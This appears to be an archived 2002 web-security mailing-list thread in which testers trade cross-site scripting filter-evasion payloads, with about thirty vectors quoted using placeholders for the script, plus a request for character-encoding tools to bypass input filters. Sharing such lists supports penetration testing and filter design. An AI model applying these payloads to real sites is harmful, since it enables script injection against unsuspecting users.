encoder

["N30" <n30_lists () hotmail com>]

Hi group,

Any links/resources/scripts to conver ASCII characters to unicode / html
encode /double decode?
Testing web apps for XSS & SQL injections, a lot of times, sites filter out
<> but forget to filter encoded versions of <>.

Thanks in advance
-N




---- Original Message -----
From: "Tomas" <tomasg () extra lt>
To: <webappsec () securityfocus com>
Sent: Monday, December 16, 2002 3:42 AM
Subject: Re: XSS Strings


> Hi.
>
> here are some more examples:
>
> <a href="javas&#99;ript&#35;[code]">
>   <div onmouseover="[code]">
>   <img src="javascript:[code]">
>   <img dynsrc="javascript:[code]"> [IE]
>   <input type="image" dynsrc="javascript:[code]"> [IE]
>   <bgsound src="javascript:[code]"> [IE]
>   &<script>[code]</script>
>   &{[code]}; [N4]
>   <img src=&{[code]};> [N4]
>   <link rel="stylesheet" href="javascript:[code]">
>   <iframe src="vbscript:[code]"> [IE]
>   <img src="mocha:[code]"> [N4]
>   <img src="livescript:[code]"> [N4]
>   <a href="about:<s&#99;ript>[code]</script>">
>   <meta http-equiv="refresh" content="0;url=javascript:[code]">
>   <body onload="[code]">
>   <div style="background-image: url(javascript:[code]);">
>   <div style="behaviour: url([link to code]);"> [IE]
>   <div style="binding: url([link to code]);"> [Mozilla]
>   <div style="width: expression([code]);"> [IE]
>   <style type="text/javascript">[code]</style> [N4]
>   <object classid="clsid:..." codebase="javascript:[code]"> [IE]
>   <style><!--</style><script>[code]//--></script>
>   <![CDATA[<!--]]><script>[code]//--></script>
>   <!-- -- --><script>[code]</script><!-- -- -->
>   <<script>[code]</script>
>   <img src="blah"onmouseover="[code]">
>   <img src="blah>" onmouseover="[code]">
>   <xml src="javascript:[code]">
>   <xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
>     <div datafld="b" dataformatas="html" datasrc="#X"></div>
>   [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
>
>
>
> Tomas
>
>
> ----- Original Message -----
> From: <securityarchitect () hush com>
> To: <webappsec () securityfocus com>
> Sent: Monday, December 16, 2002 9:54 AM
> Subject: XSS Strings
>
> > Does anyone have a good list of payloads that will cover the majority of
> the options ?